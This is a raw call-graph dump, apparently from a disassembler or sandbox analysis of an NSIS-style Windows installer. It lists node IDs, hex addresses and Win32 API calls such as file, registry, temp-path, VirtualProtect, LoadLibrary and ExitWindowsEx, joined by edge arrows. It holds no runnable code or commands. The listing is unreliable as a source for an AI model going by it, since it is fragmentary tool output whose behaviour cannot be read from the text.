4358 4056c4 MessageBoxIndirectW 4351->4358 4362 405b54 GetFileAttributesW CreateFileW 4351->4362 4354 4018c9 4353->4354 4355 4018dc 4353->4355 4356 405f0a 18 API calls 4354->4356 4357 405f0a 18 API calls 4355->4357 4359 4018d1 lstrcatW 4356->4359 4360 4018e4 4357->4360 4358->4351 4359->4360 4361 4056c4 MessageBoxIndirectW 4360->4361 4361->4352 4362->4351 4363->4331 4364->4332 5142 402452 5143 402c42 19 API calls 5142->5143 5144 40245c 5143->5144 5145 402b1b 18 API calls 5144->5145 5146 402465 5145->5146 5147 402791 5146->5147 5148 402489 RegEnumValueW 5146->5148 5149 40247d RegEnumKeyW 5146->5149 5148->5147 5150 4024a2 RegCloseKey 5148->5150 5149->5150 5150->5147 5152 4022d3 5153 402303 5152->5153 5154 4022d8 5152->5154 5155 402b38 18 API calls 5153->5155 5156 402c42 19 API calls 5154->5156 5157 40230a 5155->5157 5158 4022df 5156->5158 5163 402b78 RegOpenKeyExW 5157->5163 5159 402b38 18 API calls 5158->5159 5162 402320 5158->5162 5160 4022f0 RegDeleteValueW RegCloseKey 5159->5160 5160->5162 5170 402ba3 5163->5170 5172 402bef 5163->5172 5164 402bc9 RegEnumKeyW 5165 402bdb RegCloseKey 5164->5165 5164->5170 5167 406252 3 API calls 5165->5167 5166 402c00 RegCloseKey 5166->5172 5169 402beb 5167->5169 5168 402b78 3 API calls 5168->5170 5171 402c1b RegDeleteKeyW 5169->5171 5169->5172 5170->5164 5170->5165 5170->5166 5170->5168 5171->5172 5172->5162 5173 401ed4 5174 402b38 18 API calls 5173->5174 5175 401edb 5174->5175 5176 40622b 2 API calls 5175->5176 5177 401ee1 5176->5177 5179 401ef2 5177->5179 5180 405e2f wsprintfW 5177->5180 5180->5179 4387 403c55 4388 403da8 4387->4388 4389 403c6d 4387->4389 4391 403df9 4388->4391 4392 403db9 GetDlgItem GetDlgItem 4388->4392 4389->4388 4390 403c79 4389->4390 4393 403c84 SetWindowPos 4390->4393 4394 403c97 4390->4394 4396 403e53 4391->4396 4401 401389 2 API calls 4391->4401 4395 40412d 19 API calls 4392->4395 4393->4394 4398 403cb4 4394->4398 4399 403c9c ShowWindow 4394->4399 4400 403de3 SetClassLongW 4395->4400 4397 404179 SendMessageW 4396->4397 4417 403da3 4396->4417 4427 403e65 4397->4427 4402 403cd6 4398->4402 4403 403cbc DestroyWindow 4398->4403 4399->4398 4404 40140b 2 API calls 4400->4404 4405 403e2b 4401->4405 4406 403cdb SetWindowLongW 4402->4406 4407 403cec 4402->4407 4456 4040b6 4403->4456 4404->4391 4405->4396 4408 403e2f SendMessageW 4405->4408 4406->4417 4411 403d95 4407->4411 4412 403cf8 GetDlgItem 4407->4412 4408->4417 4409 40140b 2 API calls 4409->4427 4410 4040b8 DestroyWindow EndDialog 4410->4456 4415 404194 8 API calls 4411->4415 4413 403d28 4412->4413 4414 403d0b SendMessageW IsWindowEnabled 4412->4414 4419 403d35 4413->4419 4420 403d7c SendMessageW 4413->4420 4421 403d48 4413->4421 4432 403d2d 4413->4432 4414->4413 4414->4417 4415->4417 4416 4040e7 ShowWindow 4416->4417 4418 405f0a 18 API calls 4418->4427 4419->4420 4419->4432 4420->4411 4424 403d50 4421->4424 4425 403d65 4421->4425 4422 404106 SendMessageW 4426 403d63 4422->4426 4423 40412d 19 API calls 4423->4427 4460 40140b 4424->4460 4428 40140b 2 API calls 4425->4428 4426->4411 4427->4409 4427->4410 4427->4417 4427->4418 4427->4423 4431 40412d 19 API calls 4427->4431 4447 403ff8 DestroyWindow 4427->4447 4430 403d6c 4428->4430 4430->4411 4430->4432 4433 403ee0 GetDlgItem 4431->4433 4432->4422 4434 403ef5 4433->4434 4435 403efd ShowWindow KiUserCallbackDispatcher 4433->4435 4434->4435 4457 40414f KiUserCallbackDispatcher 4435->4457 4437 403f27 EnableWindow 4440 403f3b 4437->4440 4438 403f40 GetSystemMenu EnableMenuItem SendMessageW 4439 403f70 SendMessageW 4438->4439 4438->4440 4439->4440 4440->4438 4458 404162 SendMessageW 4440->4458 4459 405ee8 lstrcpynW 4440->4459 4443 403f9e lstrlenW 4444 405f0a 18 API calls 4443->4444 4445 403fb4 SetWindowTextW 4444->4445 4446 401389 2 API calls 4445->4446 4446->4427 4448 404012 CreateDialogParamW 4447->4448 4447->4456 4449 404045 4448->4449 4448->4456 4450 40412d 19 API calls 4449->4450 4451 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4450->4451 4452 401389 2 API calls 4451->4452 4453 404096 4452->4453 4453->4417 4454 40409e ShowWindow 4453->4454 4455 404179 SendMessageW 4454->4455 4455->4456 4456->4416 4456->4417 4457->4437 4458->4440 4459->4443 4461 401389 2 API calls 4460->4461 4462 401420 4461->4462 4462->4432 4463 10002796 4464 100027e6 4463->4464 4465 100027a6 VirtualProtect 4463->4465 4465->4464 4466 4014d7 4467 402b1b 18 API calls 4466->4467 4468 4014dd Sleep 4467->4468 4470 4029c5 4468->4470 4471 403358 #17 SetErrorMode OleInitialize 4472 406252 3 API calls 4471->4472 4473 40339b SHGetFileInfoW 4472->4473 4544 405ee8 lstrcpynW 4473->4544 4475 4033c6 GetCommandLineW 4545 405ee8 lstrcpynW 4475->4545 4477 4033d8 GetModuleHandleW 4478 4033f0 4477->4478 4479 405960 CharNextW 4478->4479 4480 4033ff CharNextW 4479->4480 4485 40340f 4480->4485 4481 4034e4 4482 4034f8 GetTempPathW 4481->4482 4546 403324 4482->4546 4484 403510 4486 403514 GetWindowsDirectoryW lstrcatW 4484->4486 4487 40356a DeleteFileW 4484->4487 4485->4481 4488 405960 CharNextW 4485->4488 4494 4034e6 4485->4494 4489 403324 11 API calls 4486->4489 4554 402dba GetTickCount GetModuleFileNameW 4487->4554 4488->4485 4491 403530 4489->4491 4491->4487 4493 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4491->4493 4492 40357e 4495 403616 4492->4495 4499 403606 4492->4499 4500 405960 CharNextW 4492->4500 4498 403324 11 API calls 4493->4498 4638 405ee8 lstrcpynW 4494->4638 4641 4037c0 4495->4641 4503 403562 4498->4503 4584 4038b2 4499->4584 4504 403599 4500->4504 4503->4487 4503->4495 4511 4035e0 4504->4511 4512 403645 lstrcatW lstrcmpiW 4504->4512 4505 403725 4507 4037a8 ExitProcess 4505->4507 4509 406252 3 API calls 4505->4509 4506 40362f 4508 4056c4 MessageBoxIndirectW 4506->4508 4513 40363d ExitProcess 4508->4513 4514 403734 4509->4514 4515 405a3b 18 API calls 4511->4515 4512->4495 4516 403661 CreateDirectoryW SetCurrentDirectoryW 4512->4516 4517 406252 3 API calls 4514->4517 4518 4035ec 4515->4518 4519 403684 4516->4519 4520 403679 4516->4520 4521 40373d 4517->4521 4518->4495 4639 405ee8 lstrcpynW 4518->4639 4651 405ee8 lstrcpynW 4519->4651 4650 405ee8 lstrcpynW 4520->4650 4524 406252 3 API calls 4521->4524 4526 403746 4524->4526 4529 403794 ExitWindowsEx 4526->4529 4535 403754 GetCurrentProcess 4526->4535 4527 4035fb 4640 405ee8 lstrcpynW 4527->4640 4528 405f0a 18 API calls 4531 4036c3 DeleteFileW 4528->4531 4529->4507 4532 4037a1 4529->4532 4533 4036d0 CopyFileW 4531->4533 4541 403692 4531->4541 4534 40140b 2 API calls 4532->4534 4533->4541 4534->4507 4538 403764 4535->4538 4536 403719 4539 405d82 40 API calls 4536->4539 4537 405d82 40 API calls 4537->4541 4538->4529 4539->4495 4540 405f0a 18 API calls 4540->4541 4541->4528 4541->4536 4541->4537 4541->4540 4542 405663 2 API calls 4541->4542 4543 403704 CloseHandle 4541->4543 4542->4541 4543->4541 4544->4475 4545->4477 4547 40617c 5 API calls 4546->4547 4549 403330 4547->4549 4548 40333a 4548->4484 4549->4548 4550 405933 3 API calls 4549->4550 4551 403342 CreateDirectoryW 4550->4551 4652 405b83 4551->4652 4656 405b54 GetFileAttributesW CreateFileW 4554->4656 4556 402dfd 4583 402e0a 4556->4583 4657 405ee8 lstrcpynW 4556->4657 4558 402e20 4559 40597f 2 API calls 4558->4559 4560 402e26 4559->4560 4658 405ee8 lstrcpynW 4560->4658 4562 402e31 GetFileSize 4563 402f32 4562->4563 4582 402e48 4562->4582 4564 402d18 33 API calls 4563->4564 4566 402f39 4564->4566 4565 4032f7 ReadFile 4565->4582 4568 402f75 GlobalAlloc 4566->4568 4566->4583 4660 40330d SetFilePointer 4566->4660 4567 402fcd 4570 402d18 33 API calls 4567->4570 4569 402f8c 4568->4569 4575 405b83 2 API calls 4569->4575 4570->4583 4572 402f56 4573 4032f7 ReadFile 4572->4573 4576 402f61 4573->4576 4574 402d18 33 API calls 4574->4582 4577 402f9d CreateFileW 4575->4577 4576->4568 4576->4583 4578 402fd7 4577->4578 4577->4583 4659 40330d SetFilePointer 4578->4659 4580 402fe5 4581 403060 46 API calls 4580->4581 4581->4583 4582->4563 4582->4565 4582->4567 4582->4574 4582->4583 4583->4492 4585 406252 3 API calls 4584->4585 4586 4038c6 4585->4586 4587 4038cc 4586->4587 4588 4038de 4586->4588 4670 405e2f wsprintfW 4587->4670 4589 405db5 3 API calls 4588->4589 4590 40390e 4589->4590 4592 40392d lstrcatW 4590->4592 4593 405db5 3 API calls 4590->4593 4594 4038dc 4592->4594 4593->4592 4661 403b88 4594->4661 4597 405a3b 18 API calls 4598 40395f 4597->4598 4599 4039f3 4598->4599 4601 405db5 3 API calls 4598->4601 4600 405a3b 18 API calls 4599->4600 4602 4039f9 4600->4602 4603 403991 4601->4603 4604 403a09 LoadImageW 4602->4604 4605 405f0a 18 API calls 4602->4605 4603->4599 4611 4039b2 lstrlenW 4603->4611 4615 405960 CharNextW 4603->4615 4606 403a30 RegisterClassW 4604->4606 4607 403aaf 4604->4607 4605->4604 4608 403a66 SystemParametersInfoW CreateWindowExW 4606->4608 4609 403ab9 4606->4609 4610 40140b 2 API calls 4607->4610 4608->4607 4609->4495 4614 403ab5 4610->4614 4612 4039c0 lstrcmpiW 4611->4612 4613 4039e6 4611->4613 4612->4613 4616 4039d0 GetFileAttributesW 4612->4616 4617 405933 3 API calls 4613->4617 4614->4609 4620 403b88 19 API calls 4614->4620 4618 4039af 4615->4618 4619 4039dc 4616->4619 4621 4039ec 4617->4621 4618->4611 4619->4613 4622 40597f 2 API calls 4619->4622 4623 403ac6 4620->4623 4671 405ee8 lstrcpynW 4621->4671 4622->4613 4625 403ad2 ShowWindow LoadLibraryW 4623->4625 4626 403b55 4623->4626 4628 403af1 LoadLibraryW 4625->4628 4629 403af8 GetClassInfoW 4625->4629 4627 405265 5 API calls 4626->4627 4630 403b5b 4627->4630 4628->4629 4631 403b22 DialogBoxParamW 4629->4631 4632 403b0c GetClassInfoW RegisterClassW 4629->4632 4633 403b77 4630->4633 4634 403b5f 4630->4634 4635 40140b 2 API calls 4631->4635 4632->4631 4636 40140b 2 API calls 4633->4636 4634->4609 4637 40140b 2 API calls 4634->4637 4635->4609 4636->4609 4637->4609 4638->4482 4639->4527 4640->4499 4642 4037d1 CloseHandle 4641->4642 4643 4037db 4641->4643 4642->4643 4644 4037e5 CloseHandle 4643->4644 4645 4037ef 4643->4645 4644->4645 4673 40381d 4645->4673 4648 405770 71 API calls 4649 40361f OleUninitialize 4648->4649 4649->4505 4649->4506 4650->4519 4651->4541 4653 405b90 GetTickCount GetTempFileNameW 4652->4653 4654 403356 4653->4654 4655 405bc6 4653->4655 4654->4484 4655->4653 4655->4654 4656->4556 4657->4558 4658->4562 4659->4580 4660->4572 4662 403b9c 4661->4662 4672 405e2f wsprintfW 4662->4672 4664 403c0d 4665 405f0a 18 API calls 4664->4665 4666 403c19 SetWindowTextW 4665->4666 4667 40393d 4666->4667 4668 403c35 4666->4668 4667->4597 4668->4667 4669 405f0a 18 API calls 4668->4669 4669->4668 4670->4594 4671->4599 4672->4664 4675 40382b 4673->4675 4674 4037f4 4674->4648 4675->4674 4676 403830 FreeLibrary GlobalFree 4675->4676 4676->4674 4676->4676 5181 40155b 5182 40296b 5181->5182 5185 405e2f wsprintfW 5182->5185 5184 402970 5185->5184 4895 4023de 4906 402c42 4895->4906 4897 4023e8 4898 402b38 18 API calls 4897->4898 4899 4023f1 4898->4899 4900 4023fc RegQueryValueExW 4899->4900 4903 402791 4899->4903 4901 40241c 4900->4901 4902 402422 RegCloseKey 4900->4902 4901->4902 4910 405e2f wsprintfW 4901->4910 4902->4903 4907 402b38 18 API calls 4906->4907 4908 402c5b 4907->4908 4909 402c69 RegOpenKeyExW 4908->4909 4909->4897 4910->4902 5193 401ce5 GetDlgItem GetClientRect 5194 402b38 18 API calls 5193->5194 5195 401d17 LoadImageW SendMessageW 5194->5195 5196 4029c5 5195->5196 5197 401d35 DeleteObject 5195->5197 5197->5196 5198 40206a 5199 402b38 18 API calls 5198->5199 5200 402071 5199->5200 5201 402b38 18 API calls 5200->5201 5202 40207b 5201->5202 5203 402b38 18 API calls 5202->5203 5204 402084 5203->5204 5205 402b38 18 API calls 5204->5205 5206 40208e 5205->5206 5207 402b38 18 API calls 5206->5207 5208 402098 5207->5208 5209 4020ac CoCreateInstance 5208->5209 5210 402b38 18 API calls 5208->5210 5213 4020cb 5209->5213 5210->5209 5211 401423 25 API calls 5212 402195 5211->5212 5213->5211 5213->5212 5214 40156b 5215 401584 5214->5215 5216 40157b ShowWindow 5214->5216 5217 401592 ShowWindow 5215->5217 5218 4029c5 5215->5218 5216->5215 5217->5218 5219 4024ec 5220 4024f1 5219->5220 5221 40250a 5219->5221 5222 402b1b 18 API calls 5220->5222 5223 402510 5221->5223 5224 40253c 5221->5224 5229 4024f8 5222->5229 5225 402b38 18 API calls 5223->5225 5226 402b38 18 API calls 5224->5226 5227 402517 WideCharToMultiByte lstrlenA 5225->5227 5228 402543 lstrlenW 5226->5228 5227->5229 5228->5229 5230 402565 WriteFile 5229->5230 5231 402791 5229->5231 5230->5231 5232 40276e 5233 402b38 18 API calls 5232->5233 5234 402775 FindFirstFileW 5233->5234 5235 40279d 5234->5235 5238 402788 5234->5238 5236 4027a6 5235->5236 5240 405e2f wsprintfW 5235->5240 5241 405ee8 lstrcpynW 5236->5241 5240->5236 5241->5238 5242 4018ef 5243 401926 5242->5243 5244 402b38 18 API calls 5243->5244 5245 40192b 5244->5245 5246 405770 71 API calls 5245->5246 5247 401934 5246->5247 5248 403870 5249 40387b 5248->5249 5250 403882 GlobalAlloc 5249->5250 5251 40387f 5249->5251 5250->5251 5252 402571 5253 402b1b 18 API calls 5252->5253 5255 402580 5253->5255 5254 40269e 5255->5254 5256 4025c6 ReadFile 5255->5256 5257 405bd7 ReadFile 5255->5257 5258 4026a0 5255->5258 5259 402606 MultiByteToWideChar 5255->5259 5261 40262c SetFilePointer MultiByteToWideChar 5255->5261 5262 4026b1 5255->5262 5256->5254 5256->5255 5257->5255 5264 405e2f wsprintfW 5258->5264 5259->5255 5261->5255 5262->5254 5263 4026d2 SetFilePointer 5262->5263 5263->5254 5264->5254 5265 4014f1 SetForegroundWindow 5266 4029c5 5265->5266 5274 4018f2 5275 402b38 18 API calls 5274->5275 5276 4018f9 5275->5276 5277 4056c4 MessageBoxIndirectW 5276->5277 5278 401902 5277->5278 4365 401df3 4366 402b38 18 API calls 4365->4366 4367 401df9 4366->4367 4368 402b38 18 API calls 4367->4368 4369 401e02 4368->4369 4370 402b38 18 API calls 4369->4370 4371 401e0b 4370->4371 4372 402b38 18 API calls 4371->4372 4373 401e14 4372->4373 4377 401423 4373->4377 4376 401e4c 4378 405192 25 API calls 4377->4378 4379 401431 ShellExecuteW 4378->4379 4379->4376 5291 4026f7 5292 4026fe 5291->5292 5294 402970 5291->5294 5293 402b1b 18 API calls 5292->5293 5295 402709 5293->5295 5296 402710 SetFilePointer 5295->5296 5296->5294 5297 402720 5296->5297 5299 405e2f wsprintfW 5297->5299 5299->5294 5307 40427b lstrlenW 5308 40429a 5307->5308 5309 40429c WideCharToMultiByte 5307->5309 5308->5309 5310 402c7d 5311 402c8f SetTimer 5310->5311 5312 402ca8 5310->5312 5311->5312 5313 402cf6 5312->5313 5314 402cfc MulDiv 5312->5314 5315 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 5314->5315 5315->5313 5317 1000103d 5318 1000101b 8 API calls 5317->5318 5319 10001056 5318->5319 5320 4014ff 5321 401507 5320->5321 5323 40151a 5320->5323 5322 402b1b 18 API calls 5321->5322 5322->5323 5324 401000 5325 401037 BeginPaint GetClientRect 5324->5325 5328 40100c DefWindowProcW 5324->5328 5326 4010f3 5325->5326 5329 401073 CreateBrushIndirect FillRect DeleteObject 5326->5329 5330 4010fc 5326->5330 5331 401179 5328->5331 5329->5326 5332 401102 CreateFontIndirectW 5330->5332 5333 401167 EndPaint 5330->5333 5332->5333 5334 401112 6 API calls 5332->5334 5333->5331 5334->5333 5335 401a00 5336 402b38 18 API calls 5335->5336 5337 401a09 ExpandEnvironmentStringsW 5336->5337 5338 401a30 5337->5338 5339 401a1d 5337->5339 5339->5338 5340 401a22 lstrcmpW 5339->5340 5340->5338 5341 401b01 5342 402b38 18 API calls 5341->5342 5343 401b08 5342->5343 5344 402b1b 18 API calls 5343->5344 5345 401b11 wsprintfW 5344->5345 5346 4029c5 5345->5346 5347 100018c1 5348 10001243 3 API calls 5347->5348 5349 100018e7 5348->5349 5350 10001243 3 API calls 5349->5350 5351 100018ef 5350->5351 5352 10001243 3 API calls 5351->5352 5354 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5351->5354 5353 10001916 5352->5353 5355 1000191f GlobalFree 5353->5355 5356 10001280 2 API calls 5354->5356 5355->5354 5357 10001aad GlobalFree GlobalFree 5356->5357 5358 404581 5359 404591 5358->5359 5360 4045b7 5358->5360 5361 40412d 19 API calls 5359->5361 5362 404194 8 API calls 5360->5362 5363 40459e SetDlgItemTextW 5361->5363 5364 4045c3 5362->5364 5363->5360 5365 405106 5366 405116 5365->5366 5367 40512a 5365->5367 5368 405173 5366->5368 5369 40511c 5366->5369 5370 405132 IsWindowVisible 5367->5370 5376 405149 5367->5376 5371 405178 CallWindowProcW 5368->5371 5372 404179 SendMessageW 5369->5372 5370->5368 5373 40513f 5370->5373 5374 405126 5371->5374 5372->5374 5378 404a5c SendMessageW 5373->5378 5376->5371 5383 404adc 5376->5383 5379 404abb SendMessageW 5378->5379 5380 404a7f GetMessagePos ScreenToClient SendMessageW 5378->5380 5381 404ab3 5379->5381 5380->5381 5382 404ab8 5380->5382 5381->5376 5382->5379 5392 405ee8 lstrcpynW 5383->5392 5385 404aef 5393 405e2f wsprintfW 5385->5393 5387 404af9 5388 40140b 2 API calls 5387->5388 5389 404b02 5388->5389 5394 405ee8 lstrcpynW 5389->5394 5391 404b09 5391->5368 5392->5385 5393->5387 5394->5391 5395 401f08 5396 402b38 18 API calls 5395->5396 5397 401f0f GetFileVersionInfoSizeW 5396->5397 5398 401f36 GlobalAlloc 5397->5398 5400 401f8c 5397->5400 5399 401f4a GetFileVersionInfoW 5398->5399 5398->5400 5399->5400 5401 401f59 VerQueryValueW 5399->5401 5401->5400 5402 401f72 5401->5402 5406 405e2f wsprintfW 5402->5406 5404 401f7e 5407 405e2f wsprintfW 5404->5407 5406->5404 5407->5400 5415 10002a4b 5416 10002a63 5415->5416 5417 100015a7 2 API calls 5416->5417 5418 10002a7e 5417->5418 5419 1000224c 5420 100022b1 5419->5420 5421 100022e7 5419->5421 5420->5421 5422 100022c3 GlobalAlloc 5420->5422 5422->5420 5423 404b0e GetDlgItem GetDlgItem 5424 404b60 7 API calls 5423->5424 5427 404d79 5423->5427 5425 404c03 DeleteObject 5424->5425 5426 404bf6 SendMessageW 5424->5426 5428 404c0c 5425->5428 5426->5425 5437 404e5d 5427->5437 5440 404a5c 5 API calls 5427->5440 5453 404dea 5427->5453 5429 404c43 5428->5429 5432 405f0a 18 API calls 5428->5432 5430 40412d 19 API calls 5429->5430 5435 404c57 5430->5435 5431 404f09 5433 404f13 SendMessageW 5431->5433 5439 404f1b 5431->5439 5434 404c25 SendMessageW SendMessageW 5432->5434 5433->5439 5434->5428 5441 40412d 19 API calls 5435->5441 5436 404d6c 5443 404194 8 API calls 5436->5443 5437->5431 5437->5436 5442 404eb6 SendMessageW 5437->5442 5438 404e4f SendMessageW 5438->5437 5445 404f34 5439->5445 5446 404f2d ImageList_Destroy 5439->5446 5454 404f44 5439->5454 5440->5453 5458 404c65 5441->5458 5442->5436 5448 404ecb SendMessageW 5442->5448 5444 4050ff 5443->5444 5449 404f3d GlobalFree 5445->5449 5445->5454 5446->5445 5447 4050b3 5447->5436 5455 4050c5 ShowWindow GetDlgItem ShowWindow 5447->5455 5451 404ede 5448->5451 5449->5454 5450 404d3a GetWindowLongW SetWindowLongW 5452 404d53 5450->5452 5462 404eef SendMessageW 5451->5462 5456 404d71 5452->5456 5457 404d59 ShowWindow 5452->5457 5453->5437 5453->5438 5454->5447 5466 404adc 4 API calls 5454->5466 5470 404f7f 5454->5470 5455->5436 5475 404162 SendMessageW 5456->5475 5474 404162 SendMessageW 5457->5474 5458->5450 5461 404cb5 SendMessageW 5458->5461 5463 404d34 5458->5463 5464 404cf1 SendMessageW 5458->5464 5465 404d02 SendMessageW 5458->5465 5461->5458 5462->5431 5463->5450 5463->5452 5464->5458 5465->5458 5466->5470 5467 405089 InvalidateRect 5467->5447 5468 40509f 5467->5468 5471 404976 21 API calls 5468->5471 5469 404fad SendMessageW 5473 404fc3 5469->5473 5470->5469 5470->5473 5471->5447 5472 405037 SendMessageW SendMessageW 5472->5473 5473->5467 5473->5472 5474->5436 5475->5427 5476 100016ce 5477 100016fd 5476->5477 5478 10001b3e 24 API calls 5477->5478 5479 10001704 5478->5479 5480 10001717 5479->5480 5481 1000170b 5479->5481 5483 10001721 5480->5483 5484 1000173e 5480->5484 5482 10001280 2 API calls 5481->5482 5490 10001715 5482->5490 5487 10001555 3 API calls 5483->5487 5485 10001744 5484->5485 5486 10001768 5484->5486 5488 100015cc 3 API calls 5485->5488 5489 10001555 3 API calls 5486->5489 5491 10001726 5487->5491 5492 10001749 5488->5492 5489->5490 5493 100015cc 3 API calls 5491->5493 5494 10001280 2 API calls 5492->5494 5495 1000172c 5493->5495 5496 1000174f GlobalFree 5494->5496 5497 10001280 2 API calls 5495->5497 5496->5490 5498 10001763 GlobalFree 5496->5498 5499 10001732 GlobalFree 5497->5499 5498->5490 5499->5490 5500 404910 5501 404920 5500->5501 5502 40493c 5500->5502 5511 4056a8 GetDlgItemTextW 5501->5511 5504 404942 SHGetPathFromIDListW 5502->5504 5505 40496f 5502->5505 5507 404959 SendMessageW 5504->5507 5508 404952 5504->5508 5506 40492d SendMessageW 5506->5502 5507->5505 5510 40140b 2 API calls 5508->5510 5510->5507 5511->5506 5512 401491 5513 405192 25 API calls 5512->5513 5514 401498 5513->5514 4380 402293 4381 402b38 18 API calls 4380->4381 4382 4022a2 4381->4382 4383 402b38 18 API calls 4382->4383 4384 4022ab 4383->4384 4385 402b38 18 API calls 4384->4385 4386 4022b5 GetPrivateProfileStringW 4385->4386 4677 401718 4678 402b38 18 API calls 4677->4678 4679 40171f SearchPathW 4678->4679 4680 40173a 4679->4680 4681 401f98 4682 401faa 4681->4682 4692 40205c 4681->4692 4683 402b38 18 API calls 4682->4683 4684 401fb1 4683->4684 4686 402b38 18 API calls 4684->4686 4685 401423 25 API calls 4690 402195 4685->4690 4687 401fba 4686->4687 4688 401fd0 LoadLibraryExW 4687->4688 4689 401fc2 GetModuleHandleW 4687->4689 4691 401fe1 4688->4691 4688->4692 4689->4688 4689->4691 4704 4062be WideCharToMultiByte 4691->4704 4692->4685 4695 401ff2 4697 402011 4695->4697 4698 401ffa 4695->4698 4696 40202b 4699 405192 25 API calls 4696->4699 4707 10001771 4697->4707 4700 401423 25 API calls 4698->4700 4701 402002 4699->4701 4700->4701 4701->4690 4702 40204e FreeLibrary 4701->4702 4702->4690 4705 4062e8 GetProcAddress 4704->4705 4706 401fec 4704->4706 4705->4706 4706->4695 4706->4696 4708 100017a1 4707->4708 4749 10001b3e 4708->4749 4710 100017a8 4711 100018be 4710->4711 4712 100017c0 4710->4712 4713 100017b9 4710->4713 4711->4701 4783 100022eb 4712->4783 4801 100022a1 4713->4801 4718 10001824 4722 10001866 4718->4722 4723 1000182a 4718->4723 4719 10001806 4814 1000248d 4719->4814 4720 100017d6 4725 100017dc 4720->4725 4730 100017e7 4720->4730 4721 100017ef 4734 100017e5 4721->4734 4811 10002b2b 4721->4811 4728 1000248d 11 API calls 4722->4728 4726 100015cc 3 API calls 4723->4726 4725->4734 4795 10002870 4725->4795 4733 10001840 4726->4733 4735 10001858 4728->4735 4805 10002614 4730->4805 4738 1000248d 11 API calls 4733->4738 4734->4718 4734->4719 4740 100018ad 4735->4740 4838 10002450 4735->4838 4737 100017ed 4737->4734 4738->4735 4740->4711 4742 100018b7 GlobalFree 4740->4742 4742->4711 4746 10001899 4746->4740 4842 10001555 wsprintfW 4746->4842 4748 10001892 FreeLibrary 4748->4746 4845 1000121b GlobalAlloc 4749->4845 4751 10001b62 4846 1000121b GlobalAlloc 4751->4846 4753 10001b6d 4847 10001243 4753->4847 4755 10001da0 GlobalFree GlobalFree GlobalFree 4756 10001dbd 4755->4756 4770 10001e07 4755->4770 4757 1000210d 4756->4757 4765 10001dd2 4756->4765 4756->4770 4759 1000212f GetModuleHandleW 4757->4759 4757->4770 4758 10001c43 GlobalAlloc 4780 10001b75 4758->4780 4762 10002140 LoadLibraryW 4759->4762 4763 10002155 4759->4763 4760 10001c8e lstrcpyW 4766 10001c98 lstrcpyW 4760->4766 4761 10001cac GlobalFree 4761->4780 4762->4763 4762->4770 4858 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4763->4858 4765->4770 4854 1000122c 4765->4854 4766->4780 4767 100021a7 4768 100021b4 lstrlenW 4767->4768 4767->4770 4859 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4768->4859 4770->4710 4771 10002167 4771->4767 4782 10002191 GetProcAddress 4771->4782 4773 10002067 4773->4770 4778 100020af lstrcpyW 4773->4778 4775 10001cea 4775->4780 4852 100015a7 GlobalSize GlobalAlloc 4775->4852 4776 10001f56 GlobalFree 4776->4780 4777 100021ce 4777->4770 4778->4770 4780->4755 4780->4758 4780->4760 4780->4761 4780->4766 4780->4770 4780->4773 4780->4775 4780->4776 4781 1000122c 2 API calls 4780->4781 4857 1000121b GlobalAlloc 4780->4857 4781->4780 4782->4767 4789 10002303 4783->4789 4784 10001243 3 API calls 4784->4789 4786 10002419 GlobalFree 4787 100017c6 4786->4787 4786->4789 4787->4720 4787->4721 4787->4734 4788 100023d5 GlobalAlloc WideCharToMultiByte 4788->4786 4789->4784 4789->4786 4789->4788 4790 1000122c GlobalAlloc lstrcpynW 4789->4790 4791 100023ae GlobalAlloc 4789->4791 4792 10002390 lstrlenW 4789->4792 4862 100012c8 4789->4862 4790->4789 4793 1000239b 4791->4793 4792->4786 4792->4793 4793->4786 4867 100025a8 4793->4867 4797 10002882 4795->4797 4796 10002927 EnumWindows 4798 10002945 4796->4798 4797->4796 4799 10002a41 4798->4799 4800 10002a36 GetLastError 4798->4800 4799->4734 4800->4799 4802 100022b1 4801->4802 4803 100017bf 4801->4803 4802->4803 4804 100022c3 GlobalAlloc 4802->4804 4803->4712 4804->4802 4809 10002630 4805->4809 4806 10002681 GlobalAlloc 4810 100026a3 4806->4810 4807 10002694 4808 10002699 GlobalSize 4807->4808 4807->4810 4808->4810 4809->4806 4809->4807 4810->4737 4812 10002b36 4811->4812 4813 10002b76 GlobalFree 4812->4813 4818 100024ad 4814->4818 4816 10002540 lstrcpyW 4816->4818 4817 100024db wsprintfW 4817->4818 4818->4816 4818->4817 4819 10002561 GlobalFree 4818->4819 4820 1000250e MultiByteToWideChar 4818->4820 4821 1000258a GlobalFree 4818->4821 4823 100024fd lstrcpynW 4818->4823 4824 10001280 2 API calls 4818->4824 4825 100024ec StringFromGUID2 4818->4825 4870 1000121b GlobalAlloc 4818->4870 4871 100012f3 4818->4871 4819->4818 4820->4818 4821->4818 4822 1000180c 4821->4822 4827 100015cc 4822->4827 4823->4818 4824->4818 4825->4818 4875 1000121b GlobalAlloc 4827->4875 4829 100015d2 4830 100015df lstrcpyW 4829->4830 4832 100015f9 4829->4832 4833 10001613 4830->4833 4832->4833 4834 100015fe wsprintfW 4832->4834 4835 10001280 4833->4835 4834->4833 4836 100012c3 GlobalFree 4835->4836 4837 10001289 GlobalAlloc lstrcpynW 4835->4837 4836->4735 4837->4836 4839 1000245e 4838->4839 4840 10001879 4838->4840 4839->4840 4841 1000247a GlobalFree 4839->4841 4840->4746 4840->4748 4841->4839 4843 10001280 2 API calls 4842->4843 4844 10001576 4843->4844 4844->4740 4845->4751 4846->4753 4848 1000127c 4847->4848 4849 1000124d 4847->4849 4848->4780 4849->4848 4860 1000121b GlobalAlloc 4849->4860 4851 10001259 lstrcpyW GlobalFree 4851->4780 4853 100015c5 4852->4853 4853->4775 4861 1000121b GlobalAlloc 4854->4861 4856 1000123b lstrcpynW 4856->4770 4857->4780 4858->4771 4859->4777 4860->4851 4861->4856 4863 100012d0 4862->4863 4864 100012ee 4862->4864 4863->4864 4865 1000122c 2 API calls 4863->4865 4864->4864 4866 100012ec 4865->4866 4866->4789 4868 100025b6 VirtualAlloc 4867->4868 4869 1000260c 4867->4869 4868->4869 4869->4793 4870->4818 4872 10001324 4871->4872 4873 100012fc 4871->4873 4872->4818 4873->4872 4874 10001308 lstrcpyW 4873->4874 4874->4872 4875->4829 5515 10001058 5516 10001243 3 API calls 5515->5516 5518 10001074 5516->5518 5517 100010dd 5518->5517 